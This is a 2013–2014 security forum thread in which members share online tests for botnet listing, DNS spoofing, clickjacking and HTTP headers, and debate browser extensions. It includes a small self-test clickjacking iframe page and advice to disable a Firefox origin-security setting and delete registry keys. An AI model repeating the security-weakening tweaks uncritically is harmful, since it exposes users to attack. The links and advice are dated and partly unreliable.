Avast WEBforum

Other => General Topics => Topic started by: polonus on July 05, 2013, 11:15:25 PM

Title: Tests and other Media topics
Post by: polonus on July 05, 2013, 11:15:25 PM
Test if your IP address does not form part of Pobelka botnet: http://check.botnet.nu/infected.php
Check your IP for botnet-blacklists: http://www.robtex.com/ip/xxx.xxx.xxx.xxx.html#blacklists
Check also here: https://forms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DNS

polonus
Title: Re: Do another test...
Post by: wyrmrider on July 06, 2013, 03:49:59 AM
note that the third link to the fbi asks for your IP address which is conveniently provided by the first link
cheers
Title: Re: Tests and other Media Topics
Post by: polonus on July 07, 2013, 07:51:40 PM
Test whether your dns is good: http://www.provos.org/dns_test.js?site=yoursite
and then go here: http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html

polonus
Title: Re: Tests and other Media Topics
Post by: polonus on July 10, 2013, 09:21:04 PM
A test for X-Frame-options (clickjacking) -> http://int21.de/frametest/  (courtesy/credits to Hanno Böck)
No red boxes on the left for me, all green!

polonus
Title: Re: Tests and other Media Topics
Post by: polonus on July 10, 2013, 09:41:19 PM
Not for the client site, but if you wanna scan a website, see: This one comes with a clickjacking warning: https://asafaweb.com/Scan?Url=www.ad.nl
vulnerable for clickjacking and a cookie warning (brought to us by AppHarbor making use of simple http requests...no pentesting whatsoever...)

enjoy,

polonus
Title: Re: Tests and other Media Topics
Post by: polonus on July 16, 2013, 12:08:08 AM
Not a test bit another topic of interest...

See: http://techblog.netflix.com/2013/06/html5-video-in-ie-11-on-windows-81.html
FEE is against: https://www.fsf.org/blogs/community/cancel-netflix-if-you-value-freedom
Should DRM come to HTML5 and will other browser makers being urged to follow these standards.
Netflix, Google and Microsoft are pro DRM in HTML5.
Will this mean the end of the open web we know today?
The proposal: https://dvcs.w3.org/hg/html-media/raw-file/tip/encrypted-media/encrypted-media.html

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 16, 2013, 12:53:46 AM
It means not needing to depend on Flash any more which has more holes than swiss cheese.
It means they'll now need to find the insecurities in HTML5. I'm sure it will not take long.  :'(
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 01:04:32 PM
Hi bob3160,

That is already happening, while you start to discuss this: http://deadliestwebattacks.com/2012/05/25/html5-unbound-part-2-of-4/ (link author = Mike)
With the new features come new insecurities and again the culprit is spelled like js, right javascript. Example see here: http://stackoverflow.com/questions/12480892/framebuffer-html5-canvas-audio-api-insecure-operation-error -> audio and web page must be same origin
so you'd have to go to  about:config in firefox and disable the security.fileuri.strict_origin_policy. (credits David Humphrey).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 06:02:23 PM
So test how your bowser performs in the HTML5 test: http://html5test.com/index.html
Google Chrome has issues with Microdata.  459 points + 13 bonus points for me...
A non-html5 browser would score 78 points, but will render web applications.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 07:35:55 PM
See: http://www.appremover.com/
downloadable free version http://www.appremover.com/download
AppRemover enables you to thoroughly uninstall many antivirus and antispyware products from your computer. It removes traces that are often left behind by the standard uninstaller, including registry keys, folders and files. AppRemover offers support for many popular antivirus/antispyware products.
Is it better as RevoUninstaller? Can it be used on an emergency USB?

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2013, 08:16:10 PM
Insecure Spy Extension amazon-1-button!

Read: http://blog.kotowicz.net/2013/07/jealous-of-prism-use-amazon-1-button.html
1-button extension in Chrome Amazon to listen in on all encrypoted SSL traffic... and they still are...
link article author = @kkotowicz
This story was confirmed here: http://www.heise.de/newsticker/meldung/Amazons-Einkaufshilfe-spioniert-Nutzer-aus-1916578.html
translate using Google Translate...

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 16, 2013, 11:47:54 PM
So test how your bowser performs in the HTML5 test: http://html5test.com/index.html (http://html5test.com/index.html)
Google Chrome has issues with Microdata.  459 points + 13 bonus points for me...
A non-html5 browser would score 78 points, but will render web applications.

polonus
Also using Chrome:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1374011219028-34387.png)
Title: Re: Tests and other Media topics
Post by: bob3160 on July 16, 2013, 11:51:03 PM
See: http://www.appremover.com/ (http://www.appremover.com/)
downloadable free version http://www.appremover.com/download (http://www.appremover.com/download)
AppRemover enables you to thoroughly uninstall many antivirus and antispyware products from your computer. It removes traces that are often left behind by the standard uninstaller, including registry keys, folders and files. AppRemover offers support for many popular antivirus/antispyware products.
Is it better as RevoUninstaller? Can it be used on an emergency USB?

Damian
Have you already forgotten ???
http://forum.avast.com/index.php?topic=102237.msg851908#msg851908 (http://forum.avast.com/index.php?topic=102237.msg851908#msg851908)

Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2013, 12:00:58 AM
Hi bob3160,

Credits go where they should.
You win. No Competition.  ;D
I just have to check the browser test results for Chrome on my new Win8 machine.  :P
The test was done on Vista.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 18, 2013, 06:21:53 PM
Only for advanced users that know what they do!

Users with firefox that wanna go on without Java,
will find that Oracle will not uninstall everything firefox related and leaves debri behind
Whenever everything in combination with Java has been uninstalled,
just open up  regedit, go to key HKEY_LOCAL_MACHINE\Software\MozillaPlugins
delete all subkeys there starting with @java.com.
Also delete the subkey HKEY_CLASSES_ROOT\CLSID\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}.
Moreover also delete file: C:\WINDOWS\system32\npDeployJava1.dll.
Before doing this make a copy of your registry in case anything goes wrong,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2013, 02:20:18 PM
Marketeers want Firefox to block ad-blockers: http://www.iab.net/iablog/2013/07/has-mozilla-lost-its-values.html
Profiling can still be done, but using third party cookies made this quite easy for ad-launchers.

By the way: tracking protection in IE9 and IE 10 could also be done, use
\ EasyPrivacy (tracking protection)
\ EasyList Standard (adblock) en/of Dutch etc. EasyList (adblock)

The reason we do not want ad-blockers to leave our browsers, is that adblockers also protect us from malicious cybercriminal marketeers.
The method adfree has already been blocked in the Google Play market, because most ads do not come locally but from big sites.

polonus
Title: Re: Tests and other Media topics
Post by: MAG on July 19, 2013, 02:42:56 PM
I only returned to IE in Windows after I discovered how to use tracking protection to block ads.

If firefox disables adblocking I will find a different linux browser (if I can't find a workaround).
Title: Re: Tests and other Media topics
Post by: polonus on July 20, 2013, 02:30:40 PM
Another botnet IP check. Are you in a database? https://www.check-and-secure.com/ipcheck/_en/solution/clean.php
Good I am not, and also here on Webbot/Spider check: http://bot.myip.ms/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 20, 2013, 05:43:44 PM
Another botnet IP check. Are you in a database? https://www.check-and-secure.com/ipcheck/_en/solution/clean.php (https://www.check-and-secure.com/ipcheck/_en/solution/clean.php)
Good I am not, and also here on Webbot/Spider check: http://bot.myip.ms/ (http://bot.myip.ms/)

polonus
Neither am I. :)
Title: Re: Tests and other Media topics
Post by: polonus on July 20, 2013, 11:41:48 PM
Like the online tests from Steve Gibson.

Do this DNS Nameserver Spoofability Test here: https://www.grc.com/dns/dns.htm

I have two different nameservers that is good,
and my results were "excellent"

For best results, you should have all green in-
External ping should be not/less visible,
External query should be ignored,
DNSSEC Security should be supported,
Alphabetic Case should be mixed,
Extra Anti-spoofing should be present.

What were your results?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2013, 12:19:27 AM
Another test to perform is a router crash test.
Hurrah, my router survived,
but my MalwareBytes Anti-Exploit Shield crashed on the test
and had to be closed. Well I have put that beta version up again.
For the test go here: https://www.grc.com/dns/crashtest.htm
And again, nice test from Steve Gibson.
Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2013, 07:42:45 PM
What HTTP server is that site running, online scan: http://andrew.hedges.name/experiments/what-server/

polonus

P.S. more from this site:  http://andrew.hedges.name/experiments/

This one is strange by andrew hedges: http://andrew.hedges.name/experiments/whatevernator/#31

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 25, 2013, 11:36:29 PM
Just look at the latest sandbox comparison test, Google and Adobe sandboxes more secure than Sandboxie.
Some tools were not considered like for instance Anubis iseclab, example: http://anubis.iseclab.org/?action=result&task_id=1976684dda45722241551da96229482f6
The Bromium Test results here: http://labs.bromium.com/2013/07/23/application-sandboxes-a-pen-testers-perspective/
Well you always have to consider the weaknesses of a sandbox.
Save someting and you are seen.
Condensed files won't run.
No driver access permitted,
So sandboxes for malware analysis certainly come with specific limitations.
Not clear what is the position of the avast sandbox here? 

Anyone to comment?

polonus
Title: Re: Tests and other Media topics
Post by: JuninhoSlo on July 27, 2013, 05:03:07 PM
Like the online tests from Steve Gibson.

Do this DNS Nameserver Spoofability Test here: https://www.grc.com/dns/dns.htm

I have two different nameservers that is good,
and my results were "excellent"

For best results, you should have all green in-
External ping should be not/less visible,
External query should be ignored,
DNSSEC Security should be supported,
Alphabetic Case should be mixed,
Extra Anti-spoofing should be present.

What were your results?

polonus

I ran Steve Gibson DNS Nameserver Spoofability Test and my results were "Bad" and I also have 2different nameservers,just like you Polonus.

Title: Re: Tests and other Media topics
Post by: MAG on July 28, 2013, 12:24:22 PM
Just look at the latest sandbox comparison test, Google and Adobe sandboxes more secure than Sandboxie.
Some tools were not considered like for instance Anubis iseclab, example: http://anubis.iseclab.org/?action=result&task_id=1976684dda45722241551da96229482f6
The Bromium Test results here: http://labs.bromium.com/2013/07/23/application-sandboxes-a-pen-testers-perspective/
Well you always have to consider the weaknesses of a sandbox.
Save someting and you are seen.
Condensed files won't run.
No driver access permitted,
So sandboxes for malware analysis certainly come with specific limitations.
Not clear what is the position of the avast sandbox here? 

Anyone to comment?

polonus

Would have been interested to hear what they thought of the Linux Chromium sandbox set-up with seccomp sandbox (plus  Mandatory Access Control enforced by Apparmor or SELinux).
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2013, 01:09:33 PM
You could also perform a test here: http://www.dnssy.com/report.php?q=
I got: Hostname looks good. Found 8 parent nameservers. Glue from root nameservers to parent nameservers is missing. This means that an extra lookup is required to find your parent nameservers. There is nothing you can do about this. No nameservers found at parent nameserver, as I have no domain nor website.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2013, 03:12:14 PM
Performing an IP Reputation Scan.

I tested here for my IP Reputation: http://ipremoval.sms.symantec.com/lookup/#
result: -
Quote
does not have a negative reputation and therefore cannot be submitted for investigation.
And not blacklisted here: http://www.ipvoid.com/scan/
Check also here: http://labs.alienvault.com/own_ip_reputation.php -> IP not found
Also check here against honeypot resources: https://www.projecthoneypot.org/ip_
and here: http://www.botsvsbrowsers.com/ip/your ip/index.html
and here: http://www.linuxmagic.com/products/bms/lookup
O.K. Do not forget to check IP here: http://www.senderbase.org/lookup?search_string=your IP
and here: https://support.proofpoint.com/rbl-lookup.cgi?ip=your IP
Quote
result: Your IP address is not currently being blocked nor delayed....

D
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2013, 10:03:37 AM
Check the health of the DNS of your domain here: http://dnscheck.pingdom.com/?domain=avast.com
This check is part of a couple of characteristic-tests that will set out malicious URLs.
We may look for:

1 DNS anomalities, open resolvers, check against urlquery dot net scanner.
 Resolved IP count Integer
2 Name server count Integer
3 Name server IP count Integer
4 Malicious ASN ratio of resolved IPs Real
5 Malicious ASN ratio of name server IPs Real

DNS fluxinet features

URL token/path characteristics: (delimited by ‘.’, ‘/’, ‘?’, ‘=’, ‘-’, ‘ ’) check with firekeeper and IDS
1 Domain token count
2 Path token count
3 Average domain token length Real
4 Average path token length Real
5 Longest domain token length
6 Longest path token length
7-9 Spam, phishing and malware SLD hit ratio Real
10 Brand name presence Binary

Web content characteristics. etc. check against : http://scanurl.net/?u='+encodeURIComponent(location.href)+'&k#results');})();
Backlinks and link popularity etc. ->  http://smallseotools.com/backlink-checker/  etc.

Info from hyunsang choi. Delecting Malicious Weblinks etc.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2013, 03:03:21 PM
Some tools to help you here: http://www.webtoolhub.com/tools.aspx
Online security tools -> example: http://evuln.com/labs/cooptraiss.com/
and example like:
http://www.iwebtool.com/google_banned?domain=www.toolshack.com
http://www.iwebtool.com/code_viewer?domain=www.toolshack.com  (10 requests allowed per hour)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 09, 2013, 09:49:46 PM
Also check here for domain info: http://sitesentral.com/www.avast.com (last updated June 8, 2013)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2013, 05:25:20 PM
Did firefox developers give in to advertisers (and malvertisers) taking some features out of the browser,
read: http://stopmalvertising.com/security/changes-in-firefox-23-get-the-disabled-options-back.html
Can be adjusted back to previous default settings via this extension: https://addons.mozilla.org/en-us/firefox/addon/settingsanity/
Is firefox also going to be an ad-launching browser rather than a browser taken out of the hands of the general user that likes to tweak it and use script-blocking and ad-blocking?

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 21, 2013, 05:36:30 PM
Could it be that Firefox want's to survive financially ???
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2013, 06:01:55 PM
Hi bob3160,

As long as I can work ABP together with NoScript and RequestPolicy in the browser I feel secure. A lot of the "a la default users" won't work a browser to their personal settings (secure) or do not know how to do this or find it "a drag". I  have no problem with the "poor" adscript developers to earn a honest slice of bread and butter (even a piece of cake once in a while), but I do not want malvertisers and malcreants (SEO click fraud malsite redirectors) to be able to play their foul games because the browser went advertiser friendly by default now.
That is why I rather use Chrome now with additional extensions over fx oruse my personal flaw of an updated version of flock socio-browser (left by developers and therefore more secure with NS and RP installed and essential code added)...
Also read: http://limi.net/checkboxes-that-kill  link article author = Alex Limi

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2013, 10:31:22 PM
Is this firefox extension a good idea or not? https://addons.mozilla.org/en-us/firefox/addon/http-nowhere/
This is to block unencrypted web traffic for added security.
Or is it just as with https everywhere that the avast shields may not scan this unencrypted traffic and therefore the use of it is not advisable?

Anyone to comment?

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 27, 2013, 10:39:17 PM
Is this firefox extension a good idea or not? https://addons.mozilla.org/en-us/firefox/addon/http-nowhere/ (https://addons.mozilla.org/en-us/firefox/addon/http-nowhere/)
This is to block unencrypted web traffic for added security.
Or is it just as with https everywhere that the avast shields may not scan this unencrypted traffic and therefore the use of it is not advisable?

Anyone to comment?

polonus
So you're supposed to create a whitelist of acceptable unencrypted sites ??? Enjoy, not something I intend to slow my system down with.
avast! already checks all these "unencrypted" sites so why add a man in the middle to make life more complicated. ???
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2013, 10:44:47 PM
Hi bob3160,

Thanks for your comment. I hope DavidR could come up with some similar opinion of this extension and why he would not use it.

Damian
Title: Re: Tests and other Media topics
Post by: !Donovan on August 27, 2013, 11:45:36 PM
Hi Polonus,

I believe that websites shouldn't be "blocked" due to the use of http, even if part https.

~!Donovan
Title: Re: Tests and other Media topics
Post by: DavidR on August 28, 2013, 12:01:06 AM
Hi bob3160,

Thanks for your comment. I hope DavidR could come up with some similar opinion of this extension and why he would not use it.

Damian

This could be a real pain in the backside blocking http content unless you specifically allow it. So it is forcing the user down the https route, by whatever means (probably having to use http everywhere) otherwise the user would be blocked from lots of site, a pain.

I don't know if this may also give the user lots of mixed content errors seen many times in these forums.

I don't think that forcing https (or blocking http) makes you any safer, so it means your traffic is encrypted, but that doesn't mean safer. You all know my feelings about that as currently it means that the web shield can't protect you. Just because a connection is https doesn't mean you can't get infected, just the reverse as you lose some of the avast protection.

####
Now I know avast are looking at ways to be able to have https traffic scanned, not just http. When this comes to fruition, then forcing https isn't such an issue.

But even then this add-on would be a pain in the backside, a little like some feel about NoScript but much more severe as it would be blocking http, crazy.
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2013, 10:01:43 AM
Hi DavidR,

Agree with you and bob3160 here, https only or http nowhere are inferior solutions as we compare this to the combination of the no script and request policy extension, where we still have the complete avast! Shields protection against http malcoded content ((obfuscated) malscripts, malicious iFrames and various malicious redirects, backlinks to drive-by-malware). Additionally users have google safebrowsing, pre-scanning guidance, so in order to get infested you have to ignore warnings and this could be qualified as "unwise" user intervention. Https only and http nowhere extensions never helped against the PEBKAC problem as the main cause of malcode getting onto computers and peripherals,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2013, 10:58:04 AM
For instance this extension may not protect against mouse snooping here: http://www.ispreview.co.uk/index.php/2013/08/isp-sky-broadband-uk-says-no-need-to-worry-about-sessioncam-snooping.html
Anyway NoScript was able to detect and eventually stop/block this alleged privacy invasion. (SessionCam, ClickTale used by British providers to analyze user interaction with/on certain websites)

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 28, 2013, 01:26:31 PM
For instance this extension may not protect against mouse snooping here: http://www.ispreview.co.uk/index.php/2013/08/isp-sky-broadband-uk-says-no-need-to-worry-about-sessioncam-snooping.html (http://www.ispreview.co.uk/index.php/2013/08/isp-sky-broadband-uk-says-no-need-to-worry-about-sessioncam-snooping.html)
Anyway NoScript was able to detect and eventually stop/block this alleged privacy invasion. (SessionCam, ClickTale used by British providers to analyze user interaction with/on certain websites)

polonus
In order for NoScript to help, you first need to know how to use it and, you need to know when not to bypass it.
Something most users don't know and therefore, NoScript is a great tool for the knowledgeable user but most novices,
simply hit the allow button.  :(
Title: Re: Tests and other Media topics
Post by: DavidR on August 28, 2013, 01:46:13 PM
There are many things that require some user knowledge, but some would say they have to have some knowledge to even find out about these tools/add-ons to start with.

NoScript isn't that complex, the complexity comes on sites that have a myriad of content from 3rd party sites. But like everything else in life you have to put in some effort to get results.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 28, 2013, 02:42:47 PM
There are many things that require some user knowledge, but some would say they have to have some knowledge to even find out about these tools/add-ons to start with.

NoScript isn't that complex, the complexity comes on sites that have a myriad of content from 3rd party sites. But like everything else in life you have to put in some effort to get results.
The one good thing is that you're blocked from an immediate infection if NoScript is active. The remainder is up to you, your other protection and some luck. :)
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2013, 05:46:48 PM
Hi bob3160,

Main site links aren't mostly the problem or the site must be malicious by intent. In most cases it is unchecked injected content or redirecting external (third party) links and iFrames that will abuse the vulnerable computer. As you said google safebrowsing and otherrs already block the main bulk of known malicious links. I think the users which have all the avast shields up and running and also checked their software through the avast software updater will become rare victims and then only if they venture out where dangers are luring (pr0n, hacks, cracks, pirated and illegal content), so going to the Interweb's back alley where cybercriminal and friends are known to be active. A grain of common security sense will prevent you better against malware infections than ten tons of protection, at least that is known to us by experience,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 29, 2013, 10:21:47 PM
Interesting real-time data to identify the global regions with the greatest attack traffic
-> http://www.akamai.com/html/technology/dataviz1.html  (source akamai technologies)
also available as app: https://itunes.apple.com/app/akamai-internet-visualization/id502695146?mt=8

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 01, 2013, 10:08:33 PM
Try the final version of ABP for IE: Adblock Plus for Internet Explorer page:

https://adblockplus.org/nl/internet-explorer
https://adblockplus.org/en/internet-explorer

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2013, 12:02:26 PM
Test your site against clickjacking.
One way to do this is test at ASafaWeb Scanner: https://asafaweb.com/Scan?Url=www etc.
Another way to pentest on your own website is  make a html page with this code:
Code: [Select]
<html>
  <head>
    <title>Clickjack test page</title>
  </head>
  <body>
    <p>You’ve been clickjacked!</p>
    <iframe sandbox="allow-scripts allow-forms" src="http://yoursite :8080" style="width:100%;height:90%"></iframe>
  </body>
</html>
  Code credits go to ITSecurity's lakshmi Prudhvi  * yoursite = main url of site  e.g. www dot mysite dot com
Whenever vulnerable and opened in the browser you see: "You have been clickjacked!"

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2013, 11:53:04 PM
Public Malware Database: http://owl.nchc.org.tw/km/

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 08, 2013, 10:40:47 PM
Does a https site use PFS?
Check with the Netcraft extension for Google Chrome and firefox.
Read: http://toolbar.netcraft.com/help/faq/index.html#pfs
PFS makes https more secure against surveillance.
even if the private key of the website has been cracked.
with PFS every session has to be cracked seperately
for instance in national security agency surveillance.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 13, 2013, 09:13:34 PM
Free malware scan as a service from this University on Saturday 9-14-2013 ->
http://www.ky3.com/news/ky3-free-computer-virus-scan-saturday-at-sbu-20130912,0,1341868.story
Free computer virus scan Saturday at SBU 'Disinfection Day'

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2013, 12:48:53 PM
Test that https page for insecure content here: http://www.whynopadlock.com/check.php
Another check I did with this extension in Google Chrome: RECX HTTP Header and Cookie Security Analyzer
from Recx Ltd - www.recx.co.uk
results:
Analysis results for:

https://www.security.nl/

HTTP security headers
Name   Value   Setting secure   Secure connection
x-frame-options   deny   
OK - follows best practice
OK - follows best practice
cache-control   no-store, no-cache, must-revalidate, post-check=0, pre-check=0   
OK - follows best practice
OK - follows best practice
strict-transport-security   max-age=31536000   
OK - follows best practice
OK - follows best practice
x-content-type-options   N/A   
Investigate - does not follow best practice
OK - follows best practice
x-xss-protection   N/A   
Investigate - does not follow best practice
OK - follows best practice
x-content-security-policy   N/A   
Investigate - does not follow best practice
OK - follows best practice
access-control-allow-origin   N/A   
OK - follows best practice
OK - follows best practice
Show all HTTP headers.
Cookie information (1 cookies)
Name   Domain   Secure attribute   HTTP only attribute   Host only attribute   Secure connection
sessionid   .www.security.nl   


Information - no risk or does not apply
OK - follows best practice
Show extended cookie properties.
Page meta security headers
Name   Value   Setting secure   Secure connection

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 21, 2013, 01:54:51 PM
Nice addition. Thanks :)
Title: Re: Tests and other Media topics
Post by: polonus on September 22, 2013, 11:19:55 PM
Wanna know where redirects go?

Good online check: http://www.internetofficer.com/seo-tool/redirect-check/
For the site here: Response


Checked link: http://forum.avast.com/index.php

Type of link: direct link

Another example -
Response


Checked link: http://www.w3.org/Protocols/rfc2616/rfc2616-s
ec10.html.

Type of redirect: 300 Multiple Choices  *

Redirected to: http://www.w3.org/Protocols/rfc2616/rfc2616-s
ec10.html.

This is explained here: http://www.checkupdown.com/status/E300.html  (info link from Pitdale)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2013, 12:29:34 PM
Do we need a hosting web reputation system?

There are various parties involved  to work towards a more secure Internet.
It is not only the (avast!) user with his, her or its webclient that has to have security at mind and work towards a more secure Internet.
It is also the website owner, webmaster and the website software coder that has to be (more) security aware.
In the virus and worms we cover all these aspects.

But it also goes higher up.
I see loads of website scanners and security analyzers exist. But what about the web hosters?
Shouldn't we put them under some form of scrutiny also?

There certainly is abusive and malicious website and IP hosting, where (criminal) money interests come first and security last.
Sitevet is a scanner to give an idea about the Autonomous System health,
also on Clean MX we can get these details and there are other (re)sources.

In a time where we see it has now more or less been confirmed (by Mrs. Feinstein's utterances)
that grands scale telco surveillance "snarfing" is being performed and the integrity of the Interwebs are at stake,
it is of the utmost importance to give security a higher priority as it had previously and as it has now.

When  even European AMX-IX is gonna have a US base now as has been decided by votes, we know this is not idle talk.
Government and other commercial snarfing will go on and only will be limited by what they see as  technically impossible.
If hosters and telco's do not work towards more secure infrastructures the situation will only get worse or stay like it is.
Therefore we not only need a website rep system but also a hosting rep system.
Google Safebrowsing is giveing such details,
but I have a hunch general users and website owners/webmasters aren't at all that aware.
I hope I am wrong here!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2013, 11:57:26 AM
Saw a double.click generated ad on a Romanian scan site
Analyzed it here: http://www.urlanalyser.net/www.mapazdrowia.pl  (adsite Romanian of course)
Analyzer is interesting while it will give resolved mistypes going there.
Analyzing adsite domains with this might be rewarding: http://www.urlanalyser.net/www.mapazdrowia.pl
Normally I do not see these ads because I neatly have them blocked, but interesting to see what doubleclick (google ads) serves up once in a while,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 06, 2013, 04:51:43 PM
To clarify specific security problems for a given site some SEO scanners certainly assist us (for social sites etc.)
For instanced an online Meta Tag analyzer (when not checked for input/output validation, embedded, should be checked with regular expressions)
we find it here: http://www.submitexpress.com/analyzer/
http://analyzer.metatags.org/  and tools here: http://seotools.scrubtheweb.com/
Read on malicious meta tag: http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/
link article author = Denis Sinegubko
These were also found to be helpful: http://www.internetofficer.com/seo-tool/redirect-check/  (watch out for malicious redirects)
Read instruction s here: http://www.stopthehacker.com/2012/11/05/how-to-discover-and-remove-malicious-redirects-in-the-htaccess-file/

http://www.seoimage.com/seo-tools/check-server-headers.php (for this I use HTTP Spy extension in Google Chrome)
combine this with a scan via urlquery dot net...see an example here: http://urlquery.net/report.php?id=6317707
go down the report page to http transactions

Enjoy and put these to good use, my friends,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 09, 2013, 11:35:13 PM
See the malicious DNS world activity. This is growing to be a real malware threat, my good forum friends, see: http://exposure.iseclab.org/
Click the drop down menu on search and search for domains and IPs into this.
Exposure is also part of this metascanner: http://www.urlvoid.com/scan

Enjoy this scan, all you folks that are into pres-scanning links,
and also try this metascanner, a real good one, as I may say so:
http://scanurl.net/?u= 
This is a nice multiscanner to check out suspicious URLs and uri's,

Stay safe through avast! and keep the avast! Shields up,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 11, 2013, 12:10:27 AM
Another nice link checker also with advice on broken links etc:
An example http://www.ranks.nl/cgi-bin/ranksnl/tools/checklink.cgi?uri=www.otrforum.com
and an additional one here: http://www.brokenlinkcheck.com/broken-links.php#status
It also alerts for (conditional) redirects and following is to give in the redirect uri.

Enjoy whenever in need of checking...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 11, 2013, 12:16:41 PM
Price of exploitkit went up with 2200% for non-Russians after exit of Blackhole vendor  ->: http://malware.dontneedcoffee.com/2013/10/paunch-arrestationthe-end-of-era.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2013, 03:47:53 PM
Again I stumbled upon an awesome test site...
Go here: http://check-host.net/check-dns?host=
For instance see DNS check for the forum: http://check-host.net/check-dns?host=forum.avast.com
What about the different result from the Vienna and Ukraine servers?
Another one: http://www.watchmouse.com/en/checkit.php
http://www.watchmouse.com/en/dnstool.php?vhost=_&vtt=1382018577&varghost=http%3A%2F%2Fforum.avast.com&vaction=trace&trace=analyse
and this: http://www.dnssy.com/report.php?q=

Enjoy, my good forum friends,

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2013, 11:38:36 PM
Nice Sucuri URL Mapping and cross domains links online tool.
Example for our forum: http://urlfind.org/?site=http%3A%2F%2Fforum.avast.com%2Findex.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2013, 12:05:59 AM
Viewed the avast forum source code through this: http://validator.w3.org/check?charset=iso-8859-1&fbc=1&doctype=HTML+4.01+Transitional&fbd=1&group=1&uri=http%3A%2F%2Fforum.avast.com%2Findex.php
Quote
Validation Output: 2 Errors

   1. Error required attribute X not specified

      ✉

      The attribute given above is required for an element that you've used, but you have omitted it. For instance, in most HTML and XHTML document types the "type" attribute is required on the "script" element and the "alt" attribute is required for the "img" element.

      Typical values for type are type="text/css" for <style> and type="text/javascript" for <script>.
          * Line 662, column 193: required attribute "alt" not specified

            …/Themes/default/images/icon_twitter.png" class="icon" />avast! on Twitter</a> |

          * Line 663, column 218: required attribute "alt" not specified

            …Themes/default/images/icon_facebook.png" class="icon" />avast! on Facebook</a>

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 29, 2013, 12:16:46 AM
Get the SSL Encryption report for your browser: https://www.fortify.net/sslcheck.html (the calomel certification check for fortify is moderate)
Try this one for a server: http://www.sslshopper.com/ssl-checker.html#hostname=https://forum.avast.com/index.php?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2013, 07:17:04 PM
Test your site for speed, example http://scanftree.in/speed/www.plancorp.com
Our forums results: http://scanftree.in/speed/forum.avast.com/

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 21, 2013, 07:38:57 PM
Test your internet connection against being part of a botnet, do the first step: https://www.check-and-secure.com/ipcheck/_nl/solution/clean.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 22, 2013, 06:08:46 PM
Did you pass this entrance exam? http://searchsecurity.techtarget.com/feature/Entrance-exam-Web-attack-prevention-and-defense
link author = by Michael Cobb (Security School)
Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 28, 2013, 06:51:15 PM
Test your DNS server against running open resolvers, 28 million DNS servers ate vulnerable.
Check your IP space: http://openresolverproject.org/
自動アクセスの場合は、電子メールを (for automatic access/e-mail)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 11, 2013, 10:22:59 PM
A check and secure test, do it here ->  http://www.check-and-secure.com/portcheck/_en/index.html

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2013, 01:16:17 AM
Hi blacklist check: http://whatismyipaddress.com/blacklist-check

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2013, 12:08:02 AM
Nice project to search on: http://hostcabi.net/

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2014, 11:34:16 PM
Scan how you are connected out: http://www.ipscanner.nl/wat_is_mijn_ip_adres.html

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on January 02, 2014, 12:05:45 AM
Scan how you are connected out: http://www.ipscanner.nl/wat_is_mijn_ip_adres.html (http://www.ipscanner.nl/wat_is_mijn_ip_adres.html)

pol
The firewall in Windows 8.1 is obviously doing it's job. :)
